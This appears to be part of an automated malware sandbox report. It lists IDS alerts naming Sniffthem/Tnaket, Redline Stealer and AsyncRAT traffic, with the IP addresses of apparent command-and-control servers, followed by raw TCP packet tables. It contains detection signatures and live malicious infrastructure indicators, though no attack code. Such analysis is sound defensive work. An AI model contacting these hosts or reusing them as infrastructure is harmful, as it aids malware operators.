07/06/24-13:28:08.134245	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49823	80	192.168.2.4	188.114.96.3
07/06/24-13:27:12.583743	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49734	80	192.168.2.4	188.114.96.3
07/06/24-13:29:12.148826	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49947	80	192.168.2.4	188.114.96.3
07/06/24-13:27:43.297660	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49792	80	192.168.2.4	188.114.96.3
07/06/24-13:28:52.930267	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49912	80	192.168.2.4	188.114.96.3
07/06/24-13:28:30.242760	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49864	80	192.168.2.4	188.114.96.3
07/06/24-13:28:38.134119	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49881	80	192.168.2.4	188.114.96.3
07/06/24-13:29:19.523977	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49953	80	192.168.2.4	188.114.96.3
07/06/24-13:28:35.333379	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49875	80	192.168.2.4	188.114.96.3
07/06/24-13:28:56.461823	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49917	80	192.168.2.4	188.114.96.3
07/06/24-13:27:37.697215	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49786	80	192.168.2.4	188.114.96.3
07/06/24-13:28:09.898942	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49828	80	192.168.2.4	188.114.96.3
07/06/24-13:29:18.447888	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49951	80	192.168.2.4	188.114.96.3
07/06/24-13:28:13.509566	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49835	80	192.168.2.4	188.114.96.3
07/06/24-13:27:56.133137	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49807	80	192.168.2.4	188.114.96.3
07/06/24-13:27:20.471851	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49752	80	192.168.2.4	192.3.140.185
07/06/24-13:27:29.539774	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49773	80	192.168.2.4	188.114.96.3
07/06/24-13:28:33.057733	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49871	80	192.168.2.4	188.114.96.3
07/06/24-13:28:36.461673	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49877	80	192.168.2.4	188.114.96.3
07/06/24-13:27:23.256466	TCP	2021697	ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious	49760	80	192.168.2.4	75.119.203.100
07/06/24-13:27:57.914474	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49810	80	192.168.2.4	188.114.96.3
07/06/24-13:29:23.136376	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49957	80	192.168.2.4	188.114.96.3
07/06/24-13:27:41.186031	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49791	80	192.168.2.4	188.114.96.3
07/06/24-13:27:33.258669	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49782	80	192.168.2.4	188.114.96.3
07/06/24-13:29:06.742456	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49939	80	192.168.2.4	188.114.96.3
07/06/24-13:27:13.975198	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49736	80	192.168.2.4	188.114.96.3
07/06/24-13:27:51.556830	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49802	80	192.168.2.4	188.114.96.3
07/06/24-13:29:04.543667	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49932	80	192.168.2.4	188.114.96.3
07/06/24-13:27:23.876923	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49762	80	192.168.2.4	192.3.140.185
07/06/24-13:27:56.977998	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49808	80	192.168.2.4	188.114.96.3
07/06/24-13:28:08.993181	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49825	80	192.168.2.4	188.114.96.3
07/06/24-13:27:38.523776	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49788	80	192.168.2.4	188.114.96.3
07/06/24-13:28:22.525957	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49849	80	192.168.2.4	188.114.96.3
07/06/24-13:29:09.320698	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49943	80	192.168.2.4	188.114.96.3
07/06/24-13:28:54.727535	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49915	80	192.168.2.4	188.114.96.3
07/06/24-13:28:25.683914	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49854	80	192.168.2.4	188.114.96.3
07/06/24-13:28:04.964754	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49820	80	192.168.2.4	188.114.96.3
07/06/24-13:27:39.422769	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49789	80	192.168.2.4	188.114.96.3
07/06/24-13:27:34.133469	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49783	80	192.168.2.4	188.114.96.3
07/06/24-13:28:45.086633	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49896	80	192.168.2.4	188.114.96.3
07/06/24-13:28:17.944095	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49843	80	192.168.2.4	188.114.96.3
07/06/24-13:28:37.292022	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49878	80	192.168.2.4	188.114.96.3
07/06/24-13:29:16.276871	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49949	80	192.168.2.4	188.114.96.3
07/06/24-13:27:28.711553	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49772	80	192.168.2.4	188.114.96.3
07/06/24-13:27:14.852608	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49739	80	192.168.2.4	192.3.140.185
07/06/24-13:29:17.117981	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49950	80	192.168.2.4	188.114.96.3
07/06/24-13:28:53.883497	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49913	80	192.168.2.4	188.114.96.3
07/06/24-13:28:04.101863	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49818	80	192.168.2.4	188.114.96.3
07/06/24-13:28:55.591740	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49916	80	192.168.2.4	188.114.96.3
07/06/24-13:27:44.196266	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49793	80	192.168.2.4	188.114.96.3
07/06/24-13:27:50.711307	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49800	80	192.168.2.4	188.114.96.3
07/06/24-13:27:52.431545	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49803	80	192.168.2.4	188.114.96.3
07/06/24-13:29:23.978283	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49959	80	192.168.2.4	188.114.96.3
07/06/24-13:27:46.086305	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49796	80	192.168.2.4	188.114.96.3
07/06/24-13:27:09.169168	TCP	2054070	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M2	49731	80	192.168.2.4	188.114.97.3
07/06/24-13:27:13.245085	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49735	80	192.168.2.4	188.114.96.3
07/06/24-13:28:11.609118	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49833	80	192.168.2.4	188.114.96.3
07/06/24-13:28:49.445792	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49907	80	192.168.2.4	188.114.96.3
07/06/24-13:27:32.441155	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1912	49779	94.232.249.204	192.168.2.4
07/06/24-13:28:59.933231	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49922	80	192.168.2.4	188.114.96.3
07/06/24-13:27:54.303209	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49805	80	192.168.2.4	188.114.96.3
07/06/24-13:29:03.242661	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49929	80	192.168.2.4	188.114.96.3
07/06/24-13:28:57.309123	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49918	80	192.168.2.4	188.114.96.3
07/06/24-13:28:52.086477	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49911	80	192.168.2.4	188.114.96.3
07/06/24-13:27:49.444587	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	7707	49797	94.232.249.204	192.168.2.4
07/06/24-13:27:48.899040	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49798	80	192.168.2.4	188.114.96.3
07/06/24-13:28:02.399445	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49816	80	192.168.2.4	188.114.96.3
07/06/24-13:29:08.461583	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49941	80	192.168.2.4	188.114.96.3
07/06/24-13:28:19.823570	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49846	80	192.168.2.4	188.114.96.3
07/06/24-13:27:37.717270	TCP	2046056	ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)	1912	49779	94.232.249.204	192.168.2.4
07/06/24-13:28:45.914533	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49900	80	192.168.2.4	188.114.96.3
07/06/24-13:28:44.222149	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49893	80	192.168.2.4	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2024 13:26:57.168637991 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.168659925 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:57.168740034 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.176676989 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.176691055 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:57.787875891 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:57.787978888 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.833885908 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.833899021 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:57.834100962 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:57.834153891 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.835841894 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:57.876507044 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.115858078 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.115895987 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.115923882 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.115952969 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116054058 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116064072 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116064072 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116064072 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116080046 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116110086 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116110086 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116118908 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116158009 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116161108 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116199970 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116203070 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116240025 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116941929 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116981030 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.116981983 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.116990089 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.117027998 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.192384958 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.192478895 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.192493916 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.192539930 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.206654072 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.206706047 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.206712008 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.206753016 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.206782103 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.206832886 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.206837893 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.206882954 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207029104 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.207075119 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207078934 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.207122087 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207125902 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.207165003 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207185030 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.207236052 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207890987 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.207942009 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.207957983 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208003044 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208007097 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208046913 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208051920 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208100080 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208105087 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208149910 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208822966 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208864927 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208868980 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.208905935 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.208955050 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.209000111 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.209005117 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.209043980 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.209659100 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.209707975 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.209712982 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.209753036 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.269884109 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.269948959 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.282821894 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.282891989 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.282907009 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.282953024 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.282958031 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.282983065 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.282993078 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.282999992 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.283021927 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.283056021 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.296972990 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.297040939 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.297049999 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.297091961 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.297096968 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.297137022 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.297693014 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.297755957 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.297785044 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.297842026 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.298541069 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.298595905 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.299386024 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.299447060 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.300215006 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.300273895 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.300349951 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.300398111 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.301203012 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.301251888 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:58.301994085 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:58.302042961 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.366996050 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367043972 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367202997 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367206097 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367218018 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367264986 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367280960 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367285013 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367327929 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367409945 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367444038 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367463112 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367466927 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367481947 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367495060 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367503881 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367506981 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367516994 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367528915 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367558002 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367562056 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367597103 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.367896080 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.367954016 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368089914 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368134022 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368149996 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368154049 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368166924 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368179083 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368191957 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368196011 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368206024 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368222952 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368238926 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368252039 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368257046 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368268013 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368282080 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368303061 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368307114 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368345976 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368937016 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368978024 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.368995905 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.368999958 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369009972 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369019032 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369031906 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369035006 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369044065 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369065046 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369076967 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369091034 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369095087 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369108915 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369121075 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369138002 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369141102 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.369158983 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.369184017 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840363979 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840404034 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840434074 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840435028 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840445042 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840468884 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840472937 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840496063 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840502977 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840512991 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840545893 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840585947 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840635061 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840747118 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840795994 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840810061 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840816021 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.840840101 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.840851068 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.841490984 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.841550112 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.841630936 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.841707945 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.841736078 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.841783047 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.842279911 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.842334986 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.842437983 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.842489958 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.843707085 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.843720913 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.843785048 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.843791008 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.843831062 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.844039917 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.844082117 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:26:59.844090939 CEST	49730	443	192.168.2.4	188.114.97.3
